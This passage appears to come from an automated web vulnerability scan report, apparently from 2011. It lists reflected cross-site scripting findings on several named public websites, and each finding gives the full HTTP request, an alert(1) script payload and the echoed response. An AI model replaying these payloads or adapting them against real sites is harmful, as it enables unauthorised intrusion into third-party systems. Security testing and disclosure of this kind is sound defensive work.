Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91832325.1303304208.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; __utma=91832325.187649019.1303169116.1303304004.1303304208.4; __utmc=91832325

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: Barracuda_Session=u07bqub8miavqff6d82gshpmr0; path=/
Set-Cookie: barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; expires=Fri, 20-May-2011 13:35:31 GMT; path=/
Date: Wed, 20 Apr 2011 13:35:30 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<input type="hidden" name="af309"><script>alert(1)</script>c537b15be43" value="1" />
...[SNIP]...

3.120. https://www.barracudanetworks.com/ns/products/request_eval_unit.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.barracudanetworks.com
Path:   /ns/products/request_eval_unit.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4837a"><script>alert(1)</script>92c292c0144 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ns/products/request_eval_unit.php?products=BWB&4837a"><script>alert(1)</script>92c292c0144=1 HTTP/1.1
Host: www.barracudanetworks.com
Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/index.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91832325.1303243982.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; __utma=91832325.187649019.1303169116.1303243982.1303304004.3; __utmc=91832325; __utmb=91832325.2.10.1303304004

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Wed, 20 Apr 2011 12:55:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta
...[SNIP]...
<input type="hidden" name="4837a"><script>alert(1)</script>92c292c0144" value="1" />
...[SNIP]...

3.121. http://www.bizfind.us/Index.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /Index.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 860e5"><script>alert(1)</script>e2c342ae66f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Index.asp??860e5"><script>alert(1)</script>e2c342ae66f=1 HTTP/1.1
Referer: http://www.bizfind.us/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.bizfind.us
Cookie: ASPSESSIONIDSABCCQDR=OAGGLIGCEHCIFDFPOAKHADBM
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15837
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Wed, 20 Apr 2011 00:58:26 GMT


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Bizfind - PORTAL OF USA COMPANIES</title>
<meta name="descrip
...[SNIP]...
<a href="http://www.bizfind.us/Index.asp??860e5"><script>alert(1)</script>e2c342ae66f=1" rel="nofollow">
...[SNIP]...

3.122. http://www.bizfind.us/impressum.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /impressum.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2791"><script>alert(1)</script>1e614f1c6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /impressum.asp?e2791"><script>alert(1)</script>1e614f1c6c=1 HTTP/1.1
Referer: http://www.bizfind.us/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.bizfind.us
Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5804
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Wed, 20 Apr 2011 01:02:06 GMT


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Bizfind - PORTAL OF USA COMPANIES</title>
<meta name="descrip
...[SNIP]...
<a href="http://www.bizfind.us/impressum.asp?e2791"><script>alert(1)</script>1e614f1c6c=1" rel="nofollow">
...[SNIP]...

3.123. http://www.bizfind.us/privacy.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /privacy.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92c7f"><script>alert(1)</script>d295bc8863c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /privacy.asp?92c7f"><script>alert(1)</script>d295bc8863c=1 HTTP/1.1
Referer: http://www.bizfind.us/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.bizfind.us
Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23026
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Wed, 20 Apr 2011 01:02:10 GMT


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Bizfind - PORTAL OF USA COMPANIES</title>
<meta name="descrip
...[SNIP]...
<a href="http://www.bizfind.us/privacy.asp?92c7f"><script>alert(1)</script>d295bc8863c=1" rel="nofollow">
...[SNIP]...

3.124. http://www.bizfind.us/pubblicita.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /pubblicita.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40415"><script>alert(1)</script>ca47b0c9abe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pubblicita.asp?40415"><script>alert(1)</script>ca47b0c9abe=1 HTTP/1.1
Referer: http://www.bizfind.us/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.bizfind.us
Cookie: ASPSESSIONIDSABCCQDR=OAGGLIGCEHCIFDFPOAKHADBM
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 8075
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Wed, 20 Apr 2011 00:58:19 GMT


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Bizfind - PORTAL OF USA COMPANIES</title>
<meta name="descrip
...[SNIP]...
<a href="http://www.bizfind.us/pubblicita.asp?40415"><script>alert(1)</script>ca47b0c9abe=1" rel="nofollow">
...[SNIP]...

3.125. http://www.bizfind.us/search.asp [cerca parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /search.asp

Issue detail

The value of the cerca request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d443e"><script>alert(1)</script>304c9412ab6 was submitted in the cerca parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.asp?cerca=searchd443e"><script>alert(1)</script>304c9412ab6&cerco=ragionesociale&cosa=&dove=&pg=1&tipo=1 HTTP/1.1
Referer: http://www.bizfind.us/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.bizfind.us
Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6606
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Wed, 20 Apr 2011 01:02:08 GMT


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Bizfind - PORTAL OF USA COMPANIES</title>
<meta name="descrip
...[SNIP]...
<a href="http://www.bizfind.us/search.asp?cerca=searchd443e"><script>alert(1)</script>304c9412ab6&cerco=ragionesociale&cosa=&dove=&pg=1&tipo=1" rel="nofollow">
...[SNIP]...

3.126. http://www.bizfind.us/search.asp [cerco parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /search.asp

Issue detail

The value of the cerco request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3da6"><script>alert(1)</script>5a3ce2ded49 was submitted in the cerco parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.asp?cerca=search&cerco=ragionesocialee3da6"><script>alert(1)</script>5a3ce2ded49&cosa=&dove=&pg=1&tipo=1 HTTP/1.1
Referer: http://www.bizfind.us/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.bizfind.us
Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6606
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Wed, 20 Apr 2011 01:02:41 GMT


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Bizfind - PORTAL OF USA COMPANIES</title>
<meta name="descrip
...[SNIP]...
<a href="http://www.bizfind.us/search.asp?cerca=search&cerco=ragionesocialee3da6"><script>alert(1)</script>5a3ce2ded49&cosa=&dove=&pg=1&tipo=1" rel="nofollow">
...[SNIP]...

3.127. http://www.bizfind.us/sitemap.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /sitemap.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcb41"><script>alert(1)</script>38e48083f60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitemap.asp?bcb41"><script>alert(1)</script>38e48083f60=1 HTTP/1.1
Referer: http://www.bizfind.us/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.bizfind.us
Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15488
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Wed, 20 Apr 2011 01:02:33 GMT


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>BIZFIND.US - SITEMAP</title>
<meta name="description" content
...[SNIP]...
<a href="http://www.bizfind.us/sitemap.asp?bcb41"><script>alert(1)</script>38e48083f60=1" rel="nofollow">
...[SNIP]...

3.128. http://www.briangardner.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.briangardner.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac42f"><script>alert(1)</script>1386c9e13ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ac42f\"><script>alert(1)</script>1386c9e13ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ac42f"><script>alert(1)</script>1386c9e13ba=1 HTTP/1.1
Host: www.briangardner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 12:36:28 GMT
Server: Apache
X-Pingback: http://www.briangardner.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en
...[SNIP]...
<a href="http://www.briangardner.com/?ac42f\"><script>alert(1)</script>1386c9e13ba=1">
...[SNIP]...

3.129. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /enq.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 488fd"><script>alert(1)</script>c1abdd6385b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enq.php/488fd"><script>alert(1)</script>c1abdd6385b=%22x:expre/**/images/aus-spec.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:27:18 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16574


<html><head>
<title>CaribbeanOcean Enquiry</title>
<meta name="author" content="Luxury Caribbean Holidays, Luxury Caribbean Ocean, Exclusive Holidays, Tailor Made Holidays, Caribbean Holidays, Holida
...[SNIP]...
<FORM method="post" action="/enq.php/488fd"><script>alert(1)</script>c1abdd6385b="x:expre/**/images/aus-spec.gif" onSubmit="return checkEmail(this);">
...[SNIP]...

3.130. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /enq.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload c2ee1><script>alert(1)</script>110769be82f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enq.php/%22%20stYlec2ee1><script>alert(1)</script>110769be82f=%22x:expre/**/images/aus-spec.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:27:13 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16580


<html><head>
<title>CaribbeanOcean Enquiry</title>
<meta name="author" content="Luxury Caribbean Holidays, Luxury Caribbean Ocean, Exclusive Holidays, Tailor Made Holidays, Caribbean Holidays, Holida
...[SNIP]...
<FORM method="post" action="/enq.php/" stYlec2ee1><script>alert(1)</script>110769be82f="x:expre/**/images/aus-spec.gif" onSubmit="return checkEmail(this);">
...[SNIP]...

3.131. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /enq.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload 56330><script>alert(1)</script>08e5f3c2de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enq.php/%22%20stYle56330><script>alert(1)</script>08e5f3c2de=%22x:expre/**/images/dubai-expert.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:27:28 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16583


<html><head>
<title>CaribbeanOcean Enquiry</title>
<meta name="author" content="Luxury Caribbean Holidays, Luxury Caribbean Ocean, Exclusive Holidays, Tailor Made Holidays, Caribbean Holidays, Holida
...[SNIP]...
<FORM method="post" action="/enq.php/" stYle56330><script>alert(1)</script>08e5f3c2de="x:expre/**/images/dubai-expert.jpg" onSubmit="return checkEmail(this);">
...[SNIP]...

3.132. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /enq.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbb52"><script>alert(1)</script>edd60039baf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enq.php/fbb52"><script>alert(1)</script>edd60039baf=%22x:expre/**/images/dubai-expert.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:27:31 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16578


<html><head>
<title>CaribbeanOcean Enquiry</title>
<meta name="author" content="Luxury Caribbean Holidays, Luxury Caribbean Ocean, Exclusive Holidays, Tailor Made Holidays, Caribbean Holidays, Holida
...[SNIP]...
<FORM method="post" action="/enq.php/fbb52"><script>alert(1)</script>edd60039baf="x:expre/**/images/dubai-expert.jpg" onSubmit="return checkEmail(this);">
...[SNIP]...

3.133. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/stylesheet.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /enq.php/%22%20stYle=%22x:expre/**/stylesheet.css

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload 9e098><script>alert(1)</script>990afe4d813 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enq.php/%22%20stYle9e098><script>alert(1)</script>990afe4d813=%22x:expre/**/stylesheet.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:27:02 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16575


<html><head>
<title>CaribbeanOcean Enquiry</title>
<meta name="author" content="Luxury Caribbean Holidays, Luxury Caribbean Ocean, Exclusive Holidays, Tailor Made Holidays, Caribbean Holidays, Holida
...[SNIP]...
<FORM method="post" action="/enq.php/" stYle9e098><script>alert(1)</script>990afe4d813="x:expre/**/stylesheet.css" onSubmit="return checkEmail(this);">
...[SNIP]...

3.134. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/stylesheet.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /enq.php/%22%20stYle=%22x:expre/**/stylesheet.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc62f"><script>alert(1)</script>df827601767 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enq.php/fc62f"><script>alert(1)</script>df827601767=%22x:expre/**/stylesheet.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:27:06 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16569


<html><head>
<title>CaribbeanOcean Enquiry</title>
<meta name="author" content="Luxury Caribbean Holidays, Luxury Caribbean Ocean, Exclusive Holidays, Tailor Made Holidays, Caribbean Holidays, Holida
...[SNIP]...
<FORM method="post" action="/enq.php/fc62f"><script>alert(1)</script>df827601767="x:expre/**/stylesheet.css" onSubmit="return checkEmail(this);">
...[SNIP]...

3.135. http://www.caribbean-ocean.com/enq.php/images/aus-spec.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /enq.php/images/aus-spec.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93d36"><script>alert(1)</script>71b3edd8e0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enq.php/images93d36"><script>alert(1)</script>71b3edd8e0d/aus-spec.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:20:02 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16561


<html><head>
<title>CaribbeanOcean Enquiry</title>
<meta name="author" content="Luxury Caribbean Holidays, Luxury Caribbean Ocean, Exclusive Holidays, Tailor Made Holidays, Caribbean Holidays, Holida
...[SNIP]...
<FORM method="post" action="/enq.php/images93d36"><script>alert(1)</script>71b3edd8e0d/aus-spec.gif" onSubmit="return checkEmail(this);">
...[SNIP]...

3.136. http://www.caribbean-ocean.com/enq.php/images/aus-spec.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /enq.php/images/aus-spec.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82b4a"><script>alert(1)</script>5a166ca3e9b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enq.php/images/aus-spec.gif82b4a"><script>alert(1)</script>5a166ca3e9b HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:20:51 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16561


<html><head>
<title>CaribbeanOcean Enquiry</title>
<meta name="author" content="Luxury Caribbean Holidays, Luxury Caribbean Ocean, Exclusive Holidays, Tailor Made Holidays, Caribbean Holidays, Holida
...[SNIP]...
<FORM method="post" action="/enq.php/images/aus-spec.gif82b4a"><script>alert(1)</script>5a166ca3e9b" onSubmit="return checkEmail(this);">
...[SNIP]...

3.137. http://www.caribbean-ocean.com/enq.php/images/dubai-expert.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /enq.php/images/dubai-expert.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ebed"><script>alert(1)</script>9fb83843369 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

